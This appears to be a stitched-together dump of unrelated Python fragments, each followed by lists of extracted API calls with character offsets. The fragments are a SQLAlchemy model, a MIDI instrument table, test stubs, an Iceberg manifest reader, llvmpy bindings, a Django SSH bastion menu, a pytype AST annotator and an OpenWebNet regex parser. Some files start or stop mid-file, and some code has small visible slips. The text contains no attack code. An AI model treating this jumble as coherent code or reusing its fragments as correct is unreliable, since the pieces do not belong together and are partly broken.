queryId = Column("queryId", String(100), ForeignKey(InitialQueryMetrics.queryId), primary_key=True)
__table_args__ = {"extend_existing": True, "schema": "raw_metrics"}
|
[
"sqlalchemy.orm.declarative_base",
"sqlalchemy.ForeignKey",
"sqlalchemy.Column",
"sqlalchemy.String",
"sqlalchemy.JSON"
] |
[((826, 844), 'sqlalchemy.orm.declarative_base', 'declarative_base', ([], {}), '()\n', (842, 844), False, 'from sqlalchemy.orm import declarative_base\n'), ((890, 952), 'sqlalchemy.Column', 'Column', (['"""id"""', 'BigInteger'], {'autoincrement': '(True)', 'primary_key': '(True)'}), "('id', BigInteger, autoincrement=True, primary_key=True)\n", (896, 952), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1001, 1024), 'sqlalchemy.JSON', 'JSON', ([], {'none_as_null': '(True)'}), '(none_as_null=True)\n', (1005, 1024), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1184, 1195), 'sqlalchemy.String', 'String', (['(100)'], {}), '(100)\n', (1190, 1195), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n'), ((1197, 1236), 'sqlalchemy.ForeignKey', 'ForeignKey', (['InitialQueryMetrics.queryId'], {}), '(InitialQueryMetrics.queryId)\n', (1207, 1236), False, 'from sqlalchemy import JSON, Column, ForeignKey, String\n')]
|
from collections import OrderedDict
instruments = OrderedDict()
instruments['Piano'] = ['Acoustic Grand Piano', 'Bright Acoustic Piano',
'Electric Grand Piano', 'Honky-tonk Piano', 'Electric Piano 1',
'Electric Piano 2', 'Harpsichord', 'Clavi',]
instruments['Chromatic Percussion'] = ['Celesta', 'Glockenspiel', 'Music Box',
'Vibraphone', 'Marimba', 'Xylophone', 'Tubular Bells', 'Dulcimer']
instruments['Organ'] = ['Drawbar Organ', 'Percussive Organ', 'Rock Organ',
'Church Organ', 'Reed Organ', 'Accordion', 'Harmonica', 'Tango Accordion']
instruments['Guitar'] = ['Acoustic Guitar (nylon)', 'Acoustic Guitar (steel)',
'Electric Guitar (jazz)', 'Electric Guitar (clean)', 'Electric Guitar (muted)',
'Overdriven Guitar', 'Distortion Guitar', 'Guitar Harmonics']
instruments['Bass'] = ['Acoustic Bass', 'Electric Bass (finger)',
'Electric Bass (pick)', 'Fretless Bass', 'Slap Bass 1', 'Slap Bass 2',
'Synth Bass 1', 'Synth Bass 2']
instruments['Strings'] = ['Violin', 'Viola', 'Cello', 'Contrabass',
'Tremolo Strings', 'Pizzicato Strings', 'Orchestral Harp', 'Timpani']
instruments['Ensemble'] = ['String Ensemble 1', 'String Ensemble 2',
'Synth Strings 1', 'Synth Strings 2', 'Choir Aahs', 'Choir Oohs', 'Synth Voice',
'Orchestra Hit']
instruments['Brass'] = ['Trumpet', 'Trombone', 'Tuba', 'Muted Trumpet',
'French Horn', 'Brass Section', 'Synth Brass 1', 'Synth Brass 2']
instruments['Reed'] = ['Soprano Sax', 'Alto Sax', 'Tenor Sax', 'Baritone Sax',
'Oboe', 'English Horn', 'Bassoon', 'Clarinet']
instruments['Pipe'] = ['Piccolo', 'Flute', 'Recorder', 'Pan Flute',
'Blown Bottle', 'Shakuhachi', 'Whistle', 'Ocarina']
instruments['Synth Lead'] = ['Lead 1 (square)', 'Lead 2 (sawtooth)',
'Lead 3 (calliope)', 'Lead 4 (chiff)', 'Lead 5 (charang)', 'Lead 6 (voice)',
'Lead 7 (fifths)', 'Lead 8 (bass + lead)']
instruments['Synth Pad'] = ['Pad 1 (new age)', 'Pad 2 (warm)',
'Pad 3 (polysynth)', 'Pad 4 (choir)', 'Pad 5 (bowed)', 'Pad 6 (metallic)',
'Pad 7 (halo)', 'Pad 8 (sweep)']
instruments['Synth Effects'] = ['FX 1 (rain)', 'FX 2 (soundtrack)',
'FX 3 (crystal)', 'FX 4 (atmosphere)', 'FX 5 (brightness)', 'FX 6 (goblins)',
'FX 7 (echoes)', 'FX 8 (sci-fi)']
instruments['World'] = ['Sitar', 'Banjo', 'Shamisen', 'Koto', 'Kalimba',
'Bag pipe', 'Fiddle', 'Shanai']
instruments['Percussion'] = ['Tinkle Bell', 'Agogo', 'Steel Drums', 'Woodblock',
'Taiko Drum', 'Melodic Tom', 'Synth Drum', 'Reverse Cymbal']
instruments['Sound Effects'] = ['Guitar Fret Noise', 'Breath Noise', 'Seashore',
'Bird Tweet', 'Telephone Ring', 'Helicopter', 'Applause', 'Gunshot']
|
[
"collections.OrderedDict"
] |
[((51, 64), 'collections.OrderedDict', 'OrderedDict', ([], {}), '()\n', (62, 64), False, 'from collections import OrderedDict\n')]
|
#!/usr/bin/env python
# encoding=utf-8
"""
Copyright (c) 2021 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
from yat.test.inject import RandomTestCase
from yat.test.inject import RandomInject
from yat.test.inject.decorator import order
class TestRandom(RandomTestCase):
def test_001(self):
pass
@order(index=1)
def test_002(self):
pass
def test_abc(self):
pass
def inject_001(self):
pass
def inject_002(self):
pass
def inject_003(self):
pass
def check_001(self):
pass
def check_002(self):
pass
@order(index=1)
def check_003(self):
pass
node = object()
inject = RandomInject(node)
functions = inject.run(TestRandom())
print(functions)
|
[
"yat.test.inject.RandomInject",
"yat.test.inject.decorator.order"
] |
[((1138, 1156), 'yat.test.inject.RandomInject', 'RandomInject', (['node'], {}), '(node)\n', (1150, 1156), False, 'from yat.test.inject import RandomInject\n'), ((764, 778), 'yat.test.inject.decorator.order', 'order', ([], {'index': '(1)'}), '(index=1)\n', (769, 778), False, 'from yat.test.inject.decorator import order\n'), ((1058, 1072), 'yat.test.inject.decorator.order', 'order', ([], {'index': '(1)'}), '(index=1)\n', (1063, 1072), False, 'from yat.test.inject.decorator import order\n')]
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import fastavro
from iceberg.api import FileFormat, Filterable
from iceberg.api.expressions import Expressions
from iceberg.api.io import CloseableGroup
from .avro import AvroToIceberg
from .manifest_entry import ManifestEntry, Status
from .partition_spec_parser import PartitionSpecParser
from .schema_parser import SchemaParser
from .table_metadata import TableMetadata
class ManifestReader(CloseableGroup, Filterable):
ALL_COLUMNS = ["*"]
CHANGE_COLUMNS = ["file_path", "file_format", "partition", "record_count", "file_size_in_bytes"]
@staticmethod
def read(file):
return ManifestReader(file=file)
def select(self, columns):
raise NotImplementedError()
def filter_partitions(self, expr):
raise NotImplementedError()
def filter_rows(self, expr):
raise NotImplementedError()
@staticmethod
def in_memory(spec, entries):
return ManifestReader(spec=spec, entries=entries)
def __init__(self, file=None, spec=None, entries=None):
self.file = file
self.schema = None
self.metadata = None
self.spec = spec
self._entries = entries
if self.file is not None:
self.__init_from_file()
else:
self.__init_from_spec()
def __init_from_file(self):
try:
with self.file.new_fo() as fo:
avro_reader = fastavro.reader(fo)
self.metadata = avro_reader.metadata
except Exception as e:
raise e
self.schema = SchemaParser.from_json(self.metadata.get("schema"))
spec_id = int(self.metadata.get("partition-spec-id", TableMetadata.INITIAL_SPEC_ID))
self.spec = PartitionSpecParser.from_json_fields(self.schema, spec_id, self.metadata.get("partition-spec"))
def __init_from_spec(self):
self.metadata = dict()
self.schema = self.spec.schema
def entries(self, columns=None):
if columns is None:
columns = ManifestReader.ALL_COLUMNS
        file_format = FileFormat.from_file_name(self.file.location())
        if file_format is None:
            raise RuntimeError("Unable to determine format of manifest: " + str(self.file))
        proj_schema = ManifestEntry.project_schema(self.spec.partition_type(), columns)
        read_entries = list()
        if file_format == FileFormat.AVRO:
            with self.file.new_fo() as fo:
                avro_reader = fastavro.reader(fo)
                for read_entry in AvroToIceberg.read_avro_row(proj_schema, avro_reader):
                    entry = ManifestEntry(schema=proj_schema, partition_type=self.spec.partition_type())
                    for i, key in enumerate(read_entry.keys()):
                        entry.put(i, read_entry[key])
                    read_entries.append(entry)
        else:
            raise RuntimeError("Invalid format for manifest file: " + str(file_format))
return read_entries
def iterator(self, part_filter=None, columns=None):
if part_filter is None and columns is None:
return self.iterator(Expressions.always_true(), Filterable.ALL_COLUMNS)
        return (entry.file for entry in self.entries() if entry.status != Status.DELETED)
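# Usage sketch (hedged): 'manifest_file' stands in for an input-file object
# exposing .location() and .new_fo(), as the methods above assume:
# reader = ManifestReader.read(manifest_file)
# for entry in reader.entries():
#     print(entry)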
|
[
"fastavro.reader",
"iceberg.api.expressions.Expressions.always_true"
] |
[((2179, 2198), 'fastavro.reader', 'fastavro.reader', (['fo'], {}), '(fo)\n', (2194, 2198), False, 'import fastavro\n'), ((3215, 3234), 'fastavro.reader', 'fastavro.reader', (['fo'], {}), '(fo)\n', (3230, 3234), False, 'import fastavro\n'), ((3858, 3883), 'iceberg.api.expressions.Expressions.always_true', 'Expressions.always_true', ([], {}), '()\n', (3881, 3883), False, 'from iceberg.api.expressions import Expressions\n')]
|
""" Various sanity tests to check that filenames are handled corectly."""
import pytest
import cad2vox
import os
# use the test case folder as their working directory
@pytest.fixture(autouse=True)
def change_test_dir(request, monkeypatch):
monkeypatch.chdir(request.fspath.dirname)
@pytest.fixture()
def cleanup():
print("Starting Pytest")
yield
print("performing cleanup of output")
if os.path.exists("greyscale.csv"):
os.remove("greyscale.csv")
############ tests for unit length
@pytest.mark.parametrize("input_length",[5,"max","0.012",-0.00001])
def test_invalid_unit_length(input_length):
# Test -ve or non-float values gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",unit_length=input_length)
@pytest.mark.parametrize("gridsize",[-5,"max","0.012",0.00001])
def test_invalid_gridsize(gridsize):
# Test negative or non int value for gridsize gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",gridsize=gridsize)
def test_set_both():
    # Test that setting both gridsize and unit_length gives error
with pytest.raises(TypeError):
cad2vox.voxelise("inputs/AMAZE_Sample.med","outputs/AMAZE_Sample.tiff",gridsize=100,unit_length=0.0001)
|
[
"os.remove",
"pytest.fixture",
"os.path.exists",
"pytest.raises",
"pytest.mark.parametrize",
"cad2vox.voxelise"
] |
[((169, 197), 'pytest.fixture', 'pytest.fixture', ([], {'autouse': '(True)'}), '(autouse=True)\n', (183, 197), False, 'import pytest\n'), ((289, 305), 'pytest.fixture', 'pytest.fixture', ([], {}), '()\n', (303, 305), False, 'import pytest\n'), ((515, 583), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""input_length"""', "[5, 'max', '0.012', -1e-05]"], {}), "('input_length', [5, 'max', '0.012', -1e-05])\n", (538, 583), False, 'import pytest\n'), ((836, 900), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""gridsize"""', "[-5, 'max', '0.012', 1e-05]"], {}), "('gridsize', [-5, 'max', '0.012', 1e-05])\n", (859, 900), False, 'import pytest\n'), ((409, 440), 'os.path.exists', 'os.path.exists', (['"""greyscale.csv"""'], {}), "('greyscale.csv')\n", (423, 440), False, 'import os\n'), ((450, 476), 'os.remove', 'os.remove', (['"""greyscale.csv"""'], {}), "('greyscale.csv')\n", (459, 476), False, 'import os\n'), ((682, 706), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (695, 706), False, 'import pytest\n'), ((716, 818), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'unit_length': 'input_length'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n unit_length=input_length)\n", (732, 818), False, 'import cad2vox\n'), ((1007, 1031), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1020, 1031), False, 'import pytest\n'), ((1041, 1136), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'gridsize': 'gridsize'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n gridsize=gridsize)\n", (1057, 1136), False, 'import cad2vox\n'), ((1245, 1269), 'pytest.raises', 'pytest.raises', (['TypeError'], {}), '(TypeError)\n', (1258, 1269), False, 'import pytest\n'), ((1279, 1389), 'cad2vox.voxelise', 'cad2vox.voxelise', (['"""inputs/AMAZE_Sample.med"""', '"""outputs/AMAZE_Sample.tiff"""'], {'gridsize': '(100)', 'unit_length': '(0.0001)'}), "('inputs/AMAZE_Sample.med', 'outputs/AMAZE_Sample.tiff',\n gridsize=100, unit_length=0.0001)\n", (1295, 1389), False, 'import cad2vox\n')]
|
from binding import *
from .namespace import llvm
from .Pass import ImmutablePass
DataLayout = llvm.Class(ImmutablePass)
StructLayout = llvm.Class()
from .LLVMContext import LLVMContext
from .ADT.StringRef import StringRef
from .Module import Module
from .Type import Type, IntegerType, StructType
from .ADT.SmallVector import SmallVector_Value
from .GlobalVariable import GlobalVariable
@DataLayout
class DataLayout:
_include_ = 'llvm/DataLayout.h'
_new_string = Constructor(cast(str, StringRef))
_new_module = Constructor(ptr(Module))
@CustomPythonStaticMethod
def new(arg):
if isinstance(arg, Module):
return DataLayout._new_module(arg)
else:
return DataLayout._new_string(arg)
isLittleEndian = Method(cast(Bool, bool))
isBigEndian = Method(cast(Bool, bool))
getStringRepresentation = Method(cast(StdString, str))
@CustomPythonMethod
def __str__(self):
return self.getStringRepresentation()
isLegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
isIllegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
exceedsNaturalStackAlignment = Method(cast(Bool, bool), cast(int, Unsigned))
fitsInLegalInteger = Method(cast(Bool, bool), cast(int, Unsigned))
getPointerABIAlignment = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerPrefAlignment = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerSize = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getPointerSizeInBits = Method(cast(Unsigned, int),
cast(int, Unsigned)).require_only(0)
getTypeSizeInBits = Method(cast(Uint64, int), ptr(Type))
getTypeStoreSize = Method(cast(Uint64, int), ptr(Type))
getTypeStoreSizeInBits = Method(cast(Uint64, int), ptr(Type))
getTypeAllocSize = Method(cast(Uint64, int), ptr(Type))
getTypeAllocSizeInBits = Method(cast(Uint64, int), ptr(Type))
getABITypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getABIIntegerTypeAlignment = Method(cast(Unsigned, int), cast(int, Unsigned))
getCallFrameTypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getPrefTypeAlignment = Method(cast(Unsigned, int), ptr(Type))
getPreferredTypeAlignmentShift = Method(cast(Unsigned, int), ptr(Type))
_getIntPtrType = Method(ptr(IntegerType),
ref(LLVMContext), cast(int, Unsigned))
_getIntPtrType.require_only(1)
_getIntPtrType.realname = 'getIntPtrType'
_getIntPtrType2 = Method(ptr(Type), ptr(Type))
_getIntPtrType2.realname = 'getIntPtrType'
@CustomPythonMethod
def getIntPtrType(self, *args):
if isinstance(args[0], LLVMContext):
return self._getIntPtrType(*args)
else:
            return self._getIntPtrType2(*args)
_getIndexedOffset = Method(cast(Uint64, int), ptr(Type),
ref(SmallVector_Value))
_getIndexedOffset.realname = 'getIndexedOffset'
@CustomPythonMethod
def getIndexedOffset(self, *args):
from llvmpy import extra
args = list(args)
args[1] = extra.make_small_vector_from_values(args[1])
        return self._getIndexedOffset(*args)
getStructLayout = Method(const(ptr(StructLayout)), ptr(StructType))
getPreferredAlignment = Method(cast(Unsigned, int), ptr(GlobalVariable))
getPreferredAlignmentLog = Method(cast(Unsigned, int), ptr(GlobalVariable))
@StructLayout
class StructLayout:
getSizeInBytes = Method(cast(Uint64, int))
getSizeInBits = Method(cast(Uint64, int))
getAlignment = Method(cast(Unsigned, int))
getElementContainingOffset = Method(cast(Unsigned, int), cast(int, Uint64))
getElementOffset = Method(cast(Uint64, int), cast(int, Unsigned))
getElementOffsetInBits = Method(cast(Uint64, int), cast(int, Unsigned))
|
[
"llvmpy.extra.make_small_vector_from_values"
] |
[((3274, 3318), 'llvmpy.extra.make_small_vector_from_values', 'extra.make_small_vector_from_values', (['args[1]'], {}), '(args[1])\n', (3309, 3318), False, 'from llvmpy import extra\n')]
|
from django.contrib.auth import authenticate
from backend import paramiko_ssh
from web import models
class SshHandler(object):
"""堡垒机交互脚本"""
def __init__(self,argv_handler_instance):
self.argv_handler_instance = argv_handler_instance
self.models = models
def auth(self):
"""认证程序"""
count = 0
while count < 3:
username = input("堡垒机账号:").strip()
password = input("Password:").strip()
user = authenticate(username=username,password=password)
if user:
self.user = user
return True
else:
                count += 1
def interactive(self):
"""启动交互脚本"""
if self.auth():
print("Ready to print all the authorized hosts...to this user ...")
while True:
host_group_list = self.user.host_groups.all()
for index,host_group_obj in enumerate(host_group_list):
print("%s.\t%s[%s]"%(index,host_group_obj.name, host_group_obj.host_to_remote_users.count()))
print("z.\t未分组主机[%s]" % (self.user.host_to_remote_users.count()))
choice = input("请选择主机组>>:").strip()
if choice.isdigit():
choice = int(choice)
selected_host_group = host_group_list[choice]
elif choice == 'z':
selected_host_group = self.user
while True:
for index,host_to_user_obj in enumerate(selected_host_group.host_to_remote_users.all()):
print("%s.\t%s" % (index, host_to_user_obj))
choice = input("请选择主机>>:").strip()
if choice.isdigit():
choice = int(choice)
selected_host_to_user_obj = selected_host_group.host_to_remote_users.all()[choice]
print("going to logon %s" % selected_host_to_user_obj )
paramiko_ssh.ssh_connect(self, selected_host_to_user_obj )
if choice == "b":
break
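# Usage sketch (hedged): 'argv_handler_instance' is whatever object the
# surrounding backend passes in, and Django settings must already be
# configured for authenticate() to work:
# handler = SshHandler(argv_handler_instance)
# handler.interactive()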
|
[
"backend.paramiko_ssh.ssh_connect",
"django.contrib.auth.authenticate"
] |
[((479, 529), 'django.contrib.auth.authenticate', 'authenticate', ([], {'username': 'username', 'password': 'password'}), '(username=username, password=password)\n', (491, 529), False, 'from django.contrib.auth import authenticate\n'), ((2010, 2067), 'backend.paramiko_ssh.ssh_connect', 'paramiko_ssh.ssh_connect', (['self', 'selected_host_to_user_obj'], {}), '(self, selected_host_to_user_obj)\n', (2034, 2067), False, 'from backend import paramiko_ssh\n')]
|
"""Library to take a Python AST and add Pytype type information to it."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from pytype import analyze
from pytype import errors
from pytype import io
from pytype import load_pytd
from pytype.pyc import opcodes
from pytype.pytd import pytd_utils
_NAME_LOAD_OPS = {
opcodes.LOAD_GLOBAL, opcodes.LOAD_FAST, opcodes.LOAD_NAME,
opcodes.LOAD_DEREF
}
_NAME_STORE_OPS = {
opcodes.STORE_GLOBAL, opcodes.STORE_FAST, opcodes.STORE_NAME,
opcodes.STORE_DEREF
}
def annotate_source(source, ast_factory, pytype_options, filename="src.py"):
"""Infer types for `source`, and return an AST of it with types added.
Args:
source: Text, the source code to type-infer and parse to an AST.
ast_factory: Callable[[Options], ast-module-like], a callable that takes the
Pytype options and returns an ast-module like object used to parse the
source to an AST and traverse the created ast.Module object.
pytype_options: pytype.config.Options, the options to pass onto Pytype.
filename: Text, the logical file path the source came from, if any. This
file won't be read.
Returns:
The created Module object from what `ast_factory` returned.
"""
traces = infer_types(source, filename, pytype_options)
ast_module = ast_factory(pytype_options)
module = ast_module.parse(source, filename)
visitor = AnnotateAstVisitor(ast_module, traces)
visitor.visit(module)
return module
def infer_types(source, filename, options):
"""Infer types for the provided source.
Args:
source: Text, the source code to analyze.
filename: Text, the filename the source came from. The file won't be read.
options: pytype.config.Options, the options to pass onto Pytype.
Returns:
Traces object with information gathered by Pytype.
"""
errorlog = errors.ErrorLog()
loader = load_pytd.create_loader(options)
vm = analyze.CallTracer(
errorlog=errorlog,
options=options,
generate_unknowns=options.protocols,
loader=loader)
with io.wrap_pytype_exceptions(PytypeError, filename=filename):
analyze.infer_types(
src=source,
filename=filename,
errorlog=errorlog,
options=options,
loader=loader,
show_library_calls=True,
tracer_vm=vm)
return Traces(vm)
class Traces(object):
"""Collection of Pytype's type inference info."""
def __init__(self, vm):
"""Creates an instance.
Args:
vm: analyze.CallTracer, VM with all the information gathered by Pytype.
"""
# The vm object has to be kept alive, otherwise the objects in opcode_traces
# cause a segfault.
self._vm = vm
self._ops_by_line = collections.defaultdict(list)
for op, symbol, type_defs in vm.opcode_traces:
trace_entry = Trace(op, symbol, type_defs)
self._ops_by_line[trace_entry.op.line].append(trace_entry)
def find_unassociated_traces(self, line_num, op_types, symbol):
"""Finds `Trace` objects that haven't been associated to an AST node.
Args:
line_num: int, the line number that the traces must be for.
op_types: Iterable[Type[pyc.opcodes.Opcode]], the types that any opcodes
matching `line_num` must also be an instance of.
symbol: Text, the trace symbol name that must also match.
Returns:
Sequence[Trace] of matching Traces.
"""
op_types = tuple(op_types)
entries = self._ops_by_line[line_num]
ops = []
for entry in entries:
if entry.associated:
continue
if not isinstance(entry.op, op_types):
continue
if entry.symbol != symbol:
continue
ops.append(entry)
return ops
class Trace(object):
"""Pytype trace information.
Attributes:
associated: bool, True if this trace has been associated with an AST node,
False if not.
"""
def __init__(self, op, symbol, type_defs):
self._op = op
self._symbol = symbol
self._type_def = _join_type_defs(type_defs)
self._type_def_annotation = _annotation_str_from_type_def(self.type_def)
self.associated = False
@property
def op(self):
"""Returns opcode.Opcode of the trace opcode."""
return self._op
@property
def symbol(self):
"""Returns Optional[Text] of the symbol name."""
return self._symbol
@property
def type_def(self):
"""Returns Optional[abstract.AtomicAbstractValue] of the Pytype type info."""
return self._type_def
@property
def type_def_annotation(self):
"""Returns Text version of `.type_def`."""
return self._type_def_annotation
class AnnotateAstVisitor(object):
"""Traverses an AST and sets type information on its nodes.
This is modeled after ast.NodeVisitor, but doesn't inherit from it because
it is ast-module agnostic so that different AST implementations can be used.
"""
def __init__(self, ast, traces):
"""Creates an instance.
Args:
ast: An ast-module-like used to traverse AST node.
traces: Traces object of Pytype trace information.
"""
self._ast = ast
self._traces = traces
def visit(self, node):
visitor = getattr(self, "visit_" + node.__class__.__name__,
self.generic_visit)
return visitor(node)
def generic_visit(self, node):
for child in self._ast.iter_child_nodes(node):
self.visit(child)
def visit_Assign(self, node): # pylint: disable=invalid-name
"""Visits an `Assign` node."""
# This changes the visit order of Assign nodes from [targets, value]
# to [value, targets] to better match the opcode order.
self.visit(node.value)
for child in node.targets:
self.visit(child)
def visit_Name(self, node): # pylint: disable=invalid-name
"""Visits a `Name` node."""
if isinstance(node.ctx, self._ast.Del):
return
ctx = node.ctx
if isinstance(ctx, self._ast.Load):
op_types = _NAME_LOAD_OPS
elif isinstance(ctx, self._ast.Store):
op_types = _NAME_STORE_OPS
else:
raise ValueError("Unsupported Name.ctx: {}".format(node.ctx))
ops = self._traces.find_unassociated_traces(node.lineno, op_types, node.id)
# For lack of a better option, take the first one.
entry = next(iter(ops), None)
self._maybe_set_type(node, entry)
def _maybe_set_type(self, node, trace):
"""Sets type information on the node, if there is any to set."""
if not trace:
return
if trace:
node.resolved_type = trace.type_def
node.resolved_annotation = trace.type_def_annotation
trace.associated = True
class PytypeError(Exception):
"""Wrap exceptions raised by Pytype."""
def _join_type_defs(type_defs):
return pytd_utils.JoinTypes(v.to_type() for v in type_defs if v)
def _annotation_str_from_type_def(type_def):
if not type_def:
return "Any"
else:
return pytd_utils.Print(type_def)
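# Usage sketch (hedged): 'my_ast_factory' and the way the options are built
# below are illustrative assumptions, not part of this module:
# from pytype import config
# options = config.Options.create()  # assumption: such a default constructor exists
# module = annotate_source("x = 1\n", my_ast_factory, options)
# print(module.body[0].targets[0].resolved_annotation)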
|
[
"pytype.analyze.CallTracer",
"pytype.analyze.infer_types",
"collections.defaultdict",
"pytype.io.wrap_pytype_exceptions",
"pytype.pytd.pytd_utils.Print",
"pytype.errors.ErrorLog",
"pytype.load_pytd.create_loader"
] |
[((1928, 1945), 'pytype.errors.ErrorLog', 'errors.ErrorLog', ([], {}), '()\n', (1943, 1945), False, 'from pytype import errors\n'), ((1957, 1989), 'pytype.load_pytd.create_loader', 'load_pytd.create_loader', (['options'], {}), '(options)\n', (1980, 1989), False, 'from pytype import load_pytd\n'), ((1998, 2109), 'pytype.analyze.CallTracer', 'analyze.CallTracer', ([], {'errorlog': 'errorlog', 'options': 'options', 'generate_unknowns': 'options.protocols', 'loader': 'loader'}), '(errorlog=errorlog, options=options, generate_unknowns=\n options.protocols, loader=loader)\n', (2016, 2109), False, 'from pytype import analyze\n'), ((2138, 2195), 'pytype.io.wrap_pytype_exceptions', 'io.wrap_pytype_exceptions', (['PytypeError'], {'filename': 'filename'}), '(PytypeError, filename=filename)\n', (2163, 2195), False, 'from pytype import io\n'), ((2201, 2345), 'pytype.analyze.infer_types', 'analyze.infer_types', ([], {'src': 'source', 'filename': 'filename', 'errorlog': 'errorlog', 'options': 'options', 'loader': 'loader', 'show_library_calls': '(True)', 'tracer_vm': 'vm'}), '(src=source, filename=filename, errorlog=errorlog,\n options=options, loader=loader, show_library_calls=True, tracer_vm=vm)\n', (2220, 2345), False, 'from pytype import analyze\n'), ((2795, 2824), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (2818, 2824), False, 'import collections\n'), ((6938, 6964), 'pytype.pytd.pytd_utils.Print', 'pytd_utils.Print', (['type_def'], {}), '(type_def)\n', (6954, 6964), False, 'from pytype.pytd import pytd_utils\n')]
|
from django.contrib import admin
from app import models
# Register your models here.
admin.site.register(models.Post)
admin.site.register(models.Comment)
admin.site.register(models.Profile)
|
[
"django.contrib.admin.site.register"
] |
[((85, 117), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Post'], {}), '(models.Post)\n', (104, 117), False, 'from django.contrib import admin\n'), ((118, 153), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Comment'], {}), '(models.Comment)\n', (137, 153), False, 'from django.contrib import admin\n'), ((154, 189), 'django.contrib.admin.site.register', 'admin.site.register', (['models.Profile'], {}), '(models.Profile)\n', (173, 189), False, 'from django.contrib import admin\n')]
|
#!/usr/bin/env python3
"""
Author : <NAME>
Date : 2021-01-15
Purpose: Python Village - Variables and Some Arithmetic
"""
import argparse
class BadIntegerValue(Exception):
"""Base class for other exception """
# --------------------------------------------------
def get_args():
""" Get command-line arguments """
parser = argparse.ArgumentParser(
description="""Variables and Some Arithmetic. Given two integers,
a and b, each less than 1000, this program returns the square of the
        hypotenuse of the right triangle whose legs have lengths a and b.""",
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('input_file',
metavar='FILE',
type=argparse.FileType('rt'),
help='Input file, max 2 integers')
args = parser.parse_args()
return args.input_file.read().rstrip().split()
# --------------------------------------------------
def main():
"""Returns the square of the hypothenuse of a triangle
with a and b legs"""
args = get_args()
list_int = [int(x) for x in args]
for i in list_int:
test_int(i)
a, b = list_int
h = (a*a) + (b*b)
print(h)
# --------------------------------------------------
def test_int(v):
"""Test if integer v is less than 1000"""
if v >= 1000:
raise BadIntegerValue("Integer must be less than 1000.")
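# Worked example: for an input file containing "3 5",
# h = 3*3 + 5*5 = 9 + 25 = 34.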
# --------------------------------------------------
if __name__ == '__main__':
main()
|
[
"argparse.ArgumentParser",
"argparse.FileType"
] |
[((343, 654), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Variables and Some Arithmetic. Given two integers,\n a and b, each less than 1000, this program returns the square of the\n hypothenuse of the right triangle whose legs have lenghts a and b."""', 'formatter_class': 'argparse.ArgumentDefaultsHelpFormatter'}), '(description=\n """Variables and Some Arithmetic. Given two integers,\n a and b, each less than 1000, this program returns the square of the\n hypothenuse of the right triangle whose legs have lenghts a and b."""\n , formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n', (366, 654), False, 'import argparse\n'), ((770, 793), 'argparse.FileType', 'argparse.FileType', (['"""rt"""'], {}), "('rt')\n", (787, 793), False, 'import argparse\n')]
|
"""Parsers."""
import re
from typing import Any, Dict, cast
UNKNOWN = 'unknown'
DELIM = '*'
SPECIAL_REQUEST = r'^\*#\d{2,4}\*\*\d{1,2}##$'
# *#*1##
ACK = r'^\*#\*(1)##$'
# *#*0##
NACK = r'^\*#\*(0)##$'
ACK_NACK_RE = r'|'.join([ACK, NACK])
# *WHO*WHAT*WHERE## *1*1*0#13236017##
BUS_COMMAND = r'^\*(\d+)\*(\d+#?\d*#?\d*#?)\*(\d*#*\d+#*\d*)##$'
# *#WHO*WHERE
STATUS_REQUEST = r'\*#(\d+)\*(\d*#*\d+#*\d*)##$'
# *#WHO*WHERE*DIMENSION(*VAL1*VALn)##
DIMENSION_REQUEST = r'^\*#(\d+)\*(\d*#*\d+#*\d*)\*([\d#\*]+)##$'
# *#WHO*WHERE*#DIMENSION*VAL1*VALn##
DIMENSION_SET = r'^\*#(\d+)\*(\d*#*\d+#*\d*)\*(\d*#*\d+#*\d*)##$'
